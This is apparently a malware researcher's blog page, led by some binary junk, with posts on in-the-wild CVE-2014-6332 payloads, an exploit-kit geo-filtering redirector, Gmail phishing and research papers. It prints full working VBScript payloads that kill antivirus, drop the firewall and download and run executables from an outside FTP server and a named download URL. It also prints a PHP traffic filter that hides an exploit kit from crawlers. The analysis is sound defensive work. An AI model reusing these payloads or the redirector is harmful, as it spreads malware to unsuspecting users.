..>h.{....?X...P?.9..]....d........N)(..2.o......_.O/.n.SrZ.....h^]...^......V.....q..........c..e...?x>..l6.ztS..L^.?..Uk.....F. ...95...9..-b...L
.d..l.uc....V....|ys...;.@...1..l...*ZOx.4.X...u......mf..N..5..
..].#).Y..G}..........vy......>C>..B..... .4.8..1!.B..(.."...........1.;..+..`....=Q..._A....G.....>E[....#._...P.?.......q.g.f.C.J ...Wq..UP....H...........fy4.........(:......-^....d......AJW.D{...(..........x....x....+.....(...jI........J"....F$..O..~j.z.|......[..Gv.E9z..........P.P l"$3D..z.m.t..d.}....~...._G$..oV..@..[.Z.....9..E...r..x..y~..Un....,.%3`N.R..J..\".%.... 0S."(q.ER......v......
HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 04 May 2015 01:36:51 GMT
Content-Length: 0
Virus Total - https://www.virustotal.com/en/file/af518ec81e4ddb7b08048b7924c7f63e55c654a702f5c62ebf3e83d39c51bab2/analysis/1430705447/
At the time of this post, the link is still active : hxxp://www.cellphoneupdated.com/fatalvirus/us/106/index.php?countryname=United%20States&model=Galaxy%20Nexus&brand=Samsung&isp=Nobis%20Technology%20Group%2C%20LLC&voluumdata=vid..00000003-87e9-496c-8000-000000000000__vpid..5226a000-bf41-11e4-8376-93ef5ad96b35__caid..a88aabcb-264f-46ba-9801-a85f36f00867__lid..1b71b07a-7436-46e5-981f-f6273dfbcbb5__rt..DJ__oid1..4e28fd07-1e86-4ea9-9d0e-bdcfc0d9ffd1__var1..U
Beware of these kinds of applications !
Saturday, March 14, 2015
A Real World Story of CVE-2014-6332 : RCE and Malware Download via VBScript !
Recently, we have observed in our analysis that the exploit code for vulnerability with identifier CVE-2014-6332 is either directly embedded in the webpages of the infected website or used as a part of Browser Exploits Packs (BEPs) for downloading malware and executing commands remotely.
Earlier, we have discussed about how Chinese domains served almost the similar exploits taken from MetaSploit (http://secniche.blogspot.com/2013/03/malware-retrospective-infected-chinese.html) to trigger infections. However, the attackers tweak the structure of exploits as per the requirements in order to conduct successful infections on the fly through compromised websites.
Let's discuss the vulnerability in question. From Internet: "CVE-2014-6332: OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka "Windows OLE Automation Array Remote Code Execution Vulnerability."
Refer: Metasploit Module (http://downloads.securityfocus.com/vulnerabilities/exploits/70952.rb) and Microsoft advisory on the subject (https://technet.microsoft.com/en-us/library/security/ms14-064.aspx)
Trend Micro has some discussed about this vulnerability (http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/) so we do now want to discuss that in detail.
Two variants of VBScript have been found that are used in conjunction with this vulnerability which are discussed below. The primary structure of the exploit remains the same but payload is solely based on the VBScript code embedded in the webpages or BEPs.
As you can see, "cmd.exe" is triggered with options "/q, /c" which forces the Windows to execute command without echoing the output which means commands are executed without any notifications in the Windows GUI. Other insights:
The Norton "360.exe" process is killed and several other commands are executed.
Another variant of exploit payload is shown below which highlights that how exactly HTTP requests are issued using AJAX and MSXML2 for downloading malware (http://natmasla.ru/ath/sploit/natmasla.exe, this link might be active) directly. VBScript calls are then used to execute the malware.
Public available exploits can be tweaked easily as discussed in the case study above. It is really interesting to analyze the types of payloads and exploits used in the wild for exploiting vulnerabilities in the browsers.
Inference: Openly available exploits are restructured by the attackers and used in BEPs to trigger infections.
Earlier, we have discussed about how Chinese domains served almost the similar exploits taken from MetaSploit (http://secniche.blogspot.com/2013/03/malware-retrospective-infected-chinese.html) to trigger infections. However, the attackers tweak the structure of exploits as per the requirements in order to conduct successful infections on the fly through compromised websites.
Let's discuss the vulnerability in question. From Internet: "CVE-2014-6332: OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka "Windows OLE Automation Array Remote Code Execution Vulnerability."
Refer: Metasploit Module (http://downloads.securityfocus.com/vulnerabilities/exploits/70952.rb) and Microsoft advisory on the subject (https://technet.microsoft.com/en-us/library/security/ms14-064.aspx)
Trend Micro has some discussed about this vulnerability (http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/) so we do now want to discuss that in detail.
Two variants of VBScript have been found that are used in conjunction with this vulnerability which are discussed below. The primary structure of the exploit remains the same but payload is solely based on the VBScript code embedded in the webpages or BEPs.
As you can see, "cmd.exe" is triggered with options "/q, /c" which forces the Windows to execute command without echoing the output which means commands are executed without any notifications in the Windows GUI. Other insights:
The Norton "360.exe" process is killed and several other commands are executed.
<script language="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("wscript.shell")
shell.run "cmd.exe /q /c net user admin /del",0
shell.run "cmd.exe /q /c sc stop sharedaccess",0
shell.run "cmd.exe /q /c md C:\RECYCLER",0
shell.run "cmd.exe /q /c taskkill /f /im 360rp.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360sd.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360tray.exe",0
shell.run "cmd.exe /q /c taskkill /f /im arp2.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 361.exe",0
shell.run "cmd.exe /q /c ping 127.0.0.1 -n 200&taskkill /f /im fp.exe&taskkill /f /im ftp.exe&taskkill /f /im arp1.exe&taskkill /f /im arp2.exe&taskkill /f /im fa1.exe&taskkill /f /im fa2.exe&taskkill /f /im fa.exe",0
shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\360.exe",0
shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\361.exe",0
shell.run "cmd.exe /q /c del C:\RECYCLER\360.exe",0
shell.run "cmd.exe /q /c del C:\RECYCLER\361.exe",0
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe C:\RECYCLER\fp.exe",0
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe c:\windows\system32\fp.exe",0
shell.run "cmd.exe /q /c copy %systemroot%\system32\ftp.exe %systemroot%\system32\fp.exe",0
shell.run "cmd.exe /q /c echo open 104.152.215.90>C:\RECYCLER\fp.dw&echo do1>>C:\RECYCLER\fp.dw&echo 123456>>C:\RECYCLER\fp.dw&echo bin >>C:\RECYCLER\fp.dw&echo get a1.exe C:\RECYCLER\a1.exe>>C:\RECYCLER\fp.dw&echo get arp2.exe C:\RECYCLER\arp2.exe>>C:\RECYCLER\fp.dw&echo get fa2.exe C:\RECYCLER\fa2.exe>>C:\RECYCLER\fp.dw&echo get cgud.exe C:\RECYCLER\cgud.exe>>C:\RECYCLER\fp.dw&echo bye >>C:\RECYCLER\fp.dw&ping 127.0.0.1 -n 10&FP -s:C:\RECYCLER\fp.dw&del C:\RECYCLER\fp.dw /q© C:\RECYCLER\fa2.exe C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\fa2.exe© C:\RECYCLER\arp2.exe C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\arp2.exe&start C:\RECYCLER\fa2.exe&start C:\RECYCLER\a1.exe&start C:\RECYCLER\cgud.exe&C:\RECYCLER\arp2.exe&del C:\RECYCLER\fp.exe",0
end function
</script>
Another variant of exploit payload is shown below which highlights that how exactly HTTP requests are issued using AJAX and MSXML2 for downloading malware (http://natmasla.ru/ath/sploit/natmasla.exe, this link might be active) directly. VBScript calls are then used to execute the malware.
<script language="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "cmd.exe", "/c CD %TEMP%&
@echo
Set objXMLHTTP=CreateObject(""MSXML2.XMLHTTP"")>wUnlRLZR.vbs&
@echo objXMLHTTP.open ""GET"",""http://natmasla.ru/ath/sploit/natmasla.exe"",false>>wUnlRLZR.vbs&
@echo
objXMLHTTP.send()>>wUnlRLZR.vbs&
@echo If objXMLHTTP.Status=200 Then>>wUnlRLZR.vbs&
@echo Set objADOStream=CreateObject(""ADODB.Stream"")>>wUnlRLZR.vbs&
@echo objADOStream.Open>>wUnlRLZR.vbs&
@echo objADOStream.Type=1 >>wUnlRLZR.vbs&
@echo objADOStream.Write objXMLHTTP.ResponseBody>>wUnlRLZR.vbs&
@echo objADOStream.Position=0 >>wUnlRLZR.vbs&
@echo objADOStream.SaveToFile ""%TEMP%\natmasla.exe"">>wUnlRLZR.vbs&
@echo objADOStream.Close>>wUnlRLZR.vbs&
@echo Set objADOStream=Nothing>>wUnlRLZR.vbs&
@echo End if>>wUnlRLZR.vbs&
@echo Set objXMLHTTP=Nothing>>wUnlRLZR.vbs&
@echo Set objShell=CreateObject(""WScript.Shell"")>>wUnlRLZR.vbs&
@echo objShell.Exec(""%TEMP%\natmasla.exe"")>>wUnlRLZR.vbs&cscript.exe %TEMP%\wUnlRLZR.vbs&del %TEMP%\wUnlRLZR.vbs", "", "open", 0
end function
</script>
Public available exploits can be tweaked easily as discussed in the case study above. It is really interesting to analyze the types of payloads and exploits used in the wild for exploiting vulnerabilities in the browsers.
Inference: Openly available exploits are restructured by the attackers and used in BEPs to trigger infections.
Labels:
Browser Exploit Pack,
CVE-2014-6332,
Cybercrime,
Malware
Sunday, February 22, 2015
A Case Study of Geo-location Filtering and Dedicated Malware Infections !
It is a wide-known fact that the majority of infectious code (iframe redirecting to browser exploit packs) is hosted on free domains or compromised websites that are sold in the underground community. In my earlier presentation at Virus Bulletin Conference (HERE), I discussed about the IP Address Logging Detection Trick (IPLDT) which basically allows the attackers to restrict the spreading of malware to a dedicated audience on the Internet. For more about BEPs, read the previous research papers:
- Styx Exploit Pack - http://secniche.org/released/VB_Styx_Exploit_Pack.pdf
- Sweet Orange Exploit Pack - http://secniche.org/released/VB_SWEET_ORANGE_EXP_AKS_RB_RJE.pdf
A simple work flow is discussed below:
- User visits the website serving infectious code.
- Infected website triggers the custom code hosted by attacker to check for the following:
- Geo-location of the IP address: If Geo-location of the IP address of the end-user is found to be mapped to specific locations in the configuration file, the user's browser is redirected to BEP for exploitation.
- Verifying whether the exploit-code has been served to this IP or not: If the database shows that IP has been served already, IP address of the end-user is filtered and BEP URL is not served.
- When the user browser lands on the BEP URL, a specific vulnerability in the browser (built-in components or plug-ins) is exploited to download malware.
In addition, filters are also added for various automated spiders to restrict the access to bots (spiders) to prevent the appearance of malicious website or links in the search results. Recently, I was analyzing a malicious website that was serving infectious code and redirects the user's browser to BEP to download malware by exploiting specific vulnerability. However, the name of the exploit kit is not known. This analysis is more concentrated on the compromised website that performs redirection of the user's browser to the BEP.
A code snippet extracted from the infected webite is presented below. It clearly shows that the user-agent and IP Geo-location("CH" = Switzerland, "DE" = Germany) components are used for setting filters on the incoming HTTP traffic. Additionally, two files are generated for building databases for the IP addresses that are either successful (sbase.txt) or unsuccessful (sbase_bad.txt) in getting the direct link of the BEP URL from the infected website.
A code snippet extracted from the infected webite is presented below. It clearly shows that the user-agent and IP Geo-location("CH" = Switzerland, "DE" = Germany) components are used for setting filters on the incoming HTTP traffic. Additionally, two files are generated for building databases for the IP addresses that are either successful (sbase.txt) or unsuccessful (sbase_bad.txt) in getting the direct link of the BEP URL from the infected website.
<?php
error_reporting(0); ini_set('display_errors',0);
function is_bot($myuagent, $myip) {
$uagents = file('uagents.txt',FILE_IGNORE_NEW_LINES);
$ips = file('ips.txt',FILE_IGNORE_NEW_LINES);
foreach ($uagents as $exp) {
if (preg_match('/'.$exp.'/i',$myuagent)) {
return true;
}
}
foreach ($ips as $exp) {
if (preg_match('/'.$exp.'/',$myip)) {
return true;
}
}
return false;
}
$countries = "CH;DE";
// no?aie?ea n nieiaoii
$good_link = "./banner.php";
// eaaay no?aie?ea
$bad_link = "./blabla.php";
//
$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];
$file = fopen("./sbase.txt","a+");
$file2 = fopen("./sbase_bad.txt","a+");
$already_showed = FALSE;
while (!feof($file)) {
$buffer = fgets($file);
$ip2 = $ip."\r\n";
if(strcmp($buffer,$ip2)==0) $already_showed = TRUE;
}
if (is_bot($_REQUEST['useragent'], $ip)) $already_showed = TRUE;
if($already_showed) {
include($bad_link);
} else {
require_once('./geoip/geoip.inc');
$gi = geoip_open("./geoip/GeoIP.dat",GEOIP_STANDARD);
$ccode = explode(";",$countries);
$show = FALSE;
foreach($ccode as $value) {
if(geoip_country_code_by_addr($gi,$ip) == $value && preg_match('/(msie|opera|firef)/i', $ua)) {
$show = TRUE;
fwrite($file,$ip."\r\n");
}
}
geoip_close($gi);
if($show) {
include($good_link);
} else {
fwrite($file2,$ip."|".$ua."\r\n");
include($bad_link);
}
}
fclose($file);
?>
On checking the stats of the two files, following stats were gathered:
- Approximately 5881 unique IP addresses (users' browsers) were successfully redirected to the BEP.
- Approximately 15737 unique IP addresses (users' browsers) were restricted from visiting to the BEP.
The list of banned user-agents are shown below:
Ask\s*Jeeves
HP\s*Web\s*PrintSmart
HTTrack
IDBot
Indy\s*Library#
ListChecker
MSIECrawler
NetCache
Nutch
RPT-HTTPClient
rulinki\.ru
Twiceler
WebAlta
Webster\s*Pro
www\.cys\.ru
Wysigot
Yahoo!\s*Slurp
Yeti
Accoona
CazoodleBot
CFNetwork
ConveraCrawlerDISCo
Download\s*Master
FAST\s*MetaWeb\s*Crawler
Flexum\s*spider
Gigabot
HTMLParser
ia_archiver
ichiro
IRLbot
Java
km\.ru\s*bot
kmSearchBot
libwww-perl
Lupa\.ru
LWP::Simple
lwp-trivial
Missigua
MJ12bot
msnbot
msnbot-media
Offline\s*Explorer
OmniExplorer_Bot
PEAR
psbot
Python
rulinki\.ru
SMILE
Speedy
Teleport\s*Pro
TurtleScanner
User-Agent
voyager
Webalta
WebCopier
WebData
WebZIP
Wget
Yandex
Yanga
Yeti
msnbot
spider
yahoo
jeeves
google
altavista
scooter
av\s*fetch
asterias
spiderthread revision
sqworm
ask
lycos.spider
infoseek sidewinder
ultraseek
polybot
webcrawler
robozill
gulliver
architextspider
yahoo!\s*slurp
charlotte
ngb
77.120.162.20|Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.16
77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
194.124.140.39|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
41.249.252.199|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
213.14.101.210|Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
46.126.65.93|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
194.179.92.135|Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
213.14.101.210|Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
93.199.31.78|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; tb-webde/2.6.0; rv:11.0) like Gecko
77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
188.63.105.11|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
84.253.30.110|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
194.179.92.135|Mozilla/4.0 (compatible;)
189.19.165.228|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
66.102.6.183|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.68 Safari/537.36
66.249.93.223|Mozilla/5.0 (en-us) AppleWebKit/534.14 (KHTML, like Gecko; Google Wireless Transcoder) Chrome/9.0.597 Safari/534.14
81.62.35.97|Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
195.78.246.18|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Inference: BEPs extensively use IPLDT to manage the infections and make the malicious code to be served to dedicated countries.
Sunday, February 8, 2015
Virus Bulletin Paper - Prosecting the Citadel botnet !
Virus Bulletin published earlier our research on Citadel. Check the links:
Full PDF paper : https://www.virusbtn.com/pdf/magazine/2014/vb201409-Citadel.pdf
- Prosecting the Citadel botnet - revealing the dominance of the Zeus descendent: part one : https://www.virusbtn.com/virusbulletin/archive/2014/09/vb201409-Citadel-1
- Prosecting the Citadel botnet - revealing the dominance of the Zeus descendent: part two : https://www.virusbtn.com/virusbulletin/archive/2014/09/vb201409-Citadel-2
Full PDF paper : https://www.virusbtn.com/pdf/magazine/2014/vb201409-Citadel.pdf
Sunday, August 24, 2014
Tuesday, April 15, 2014
Targeted Cyber Attacks Book - Syngress !
Update: A very insightful review of the book published in Network Security.
I started sketching this book about a year ago when I was invited by Syngress for this project based on my previous work on crimeware research. Thanks to the Syngress and Elsevier team for this step. Due to my ongoing job and commitments, the project got delayed but eventually the book is about to be published on 18th April. The first edition of the book is dedicated to the readers who are interested in understanding the artifacts of targeted cyber-attacks and associated components. Personally, I would like to thank all the researchers and journalists who reviewed the book and provided positive feedback.
Introduction: Cyber-crime increasingly impacts both the online and offline world, and targeted attacks play a significant role in disrupting services in both. Targeted attacks are those that are aimed at a particular individual, group, or type of site or service. Unlike worms and viruses that usually attack indiscriminately, targeted attacks involve intelligence-gathering and planning to a degree that drastically changes its profile.
Individuals, corporations, and even governments are facing new threats from targeted attacks. Targeted Cyber Attacks examines real-world examples of directed attacks and provides insight into what techniques and resources are used to stage these attacks so that you can counter them more effectively.
The book is available to be ordered at following places:
- Amazon: http://www.amazon.com/Targeted-Cyber-Attacks-Multi-staged-Exploits/dp/0128006048
- Kindle Edition: http://www.amazon.com/Targeted-Cyber-Attacks-Multi-staged-Exploits-ebook/dp/B00JRVB3UY
- Elsevier: http://store.elsevier.com/Targeted-Cyber-Attacks/Aditya-Sood/isbn-9780128006047/
- Barnes and Noble: http://www.barnesandnoble.com/w/targeted-cyber-attacks-aditya-sood/1118602703?ean=9780128006047
Enjoy !
Thursday, February 27, 2014
Gmail Phishing Attack - Why the Anti-spam Solutions Fail to Trigger ?
Update: 5th March, 2014
Note: I am concerned because it got delivered to my personal gmail inbox -:)
It looks like the phishing attack discussed earlier (a week ago) on gmail users is still underway. Although, the attack is public now, the endpoint security solutions deployed by Google still fails to mark the emails as phished. The latest snapshot of this attack is presented below:
Links:
- hxxp://croydon.com.br/phpthumb/serv/serv/Login.htm
- hxxp://croydon.com.br/phpthumb/serv/serv/badu.php
The host has a malice history though : https://www.virustotal.com/en/ip-address/187.17.98.129/information/
It is not a reliable way to depend heavily on safe-browsing all the time for blacklisting the phishing websites rather the prevention has to be triggered at the time of origin. Let's see how long this continues.
-------------------------------
A recent targeted phishing attack has been launched against gmail.com users. Interestingly, the email slipped through Google end point security solution which fails to detect the spam email and served it properly to the user's inbox.
Visiting the link results in the following webpage showing the same layout as of Gmail.
Malicious Check:
- The domain resolves to an IP address which has a history of being potential malice: https://www.virustotal.com/en/ip-address/79.170.44.127/information/. The virtual hosting server has been used for compromised WordPress websites.
Overall, basic steps:
- The user is redirected and served with a gmail.com webpage here: hxxp://www.nusurgix.com/virtusite/phpthumb/serv/Login.htm
- The form submission sends all the POST data to: hxxp://www.nusurgix.com/virtusite/phpthumb/serv/badu.php
- The user redirects successfully to legitimate gmail.com webpage: hxxps://accounts.google.com/
The website is hosted on a CMS hosting server as shown below:
Overall, it might not be that sophisticated attack, but a few inferences:
- Smart user would have detected that this is a trick even it is delivered to inbox.
- Big issue, the anti-spam solutions in Google's network fails to detect it and mark it as phished.
- There might be a possibility that a few users would have fallen to this trick but we cannot be sure.
- The attacker used a compromised network infrastructure to execute this attack. A healthcare provider hosting account is compromised.
- This type of attack if remains active for only few minutes could have already garnered a good set of accounts.
Do not fall for this trap !
Sunday, January 12, 2014
Virus Bulletin - NiFramer Iframer Injector - CPanel
A couple of months earlier, we released a paper on the design of NiFramer, a bash tool to automate the Iframe injections on the compromised servers. It has been used widely by attackers. However, in coming time, we will be covering different variants of automated Iframe injection tools.
You can download the paper at: http://secniche.org/released/VB_CPANEL_IFRAME_INJECT.pdf
Labels:
CPanel Infection,
Iframe injector,
Malware,
Server Infections
Subscribe to:
Posts (Atom)